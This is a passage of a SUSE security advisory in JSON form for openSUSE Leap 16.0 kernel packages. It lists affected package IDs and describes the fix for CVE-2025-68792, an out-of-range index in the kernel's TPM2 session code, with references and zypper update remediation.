"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm2-sessions: Fix out of range indexing in name_size\n\n\u0027name_size\u0027 does not have any range checks, and it just directly indexes\nwith TPM_ALG_ID, which could lead into memory corruption at worst.\n\nAddress the issue by only processing known values and returning -EINVAL for\nunrecognized values.\n\nMake also \u0027tpm_buf_append_name\u0027 and \u0027tpm_buf_fill_hmac_session\u0027 fallible so\nthat errors are detected before causing any spurious TPM traffic.\n\nEnd also the authorization session on failure in both of the functions, as\nthe session state would be then by definition corrupted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68792",
"url": "https://www.suse.com/security/cve/CVE-2025-68792"
},
{
"category": "external",
"summary": "SUSE Bug 1256656 for CVE-2025-68792",
"url": "https://bugzilla.suse.com/1256656"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
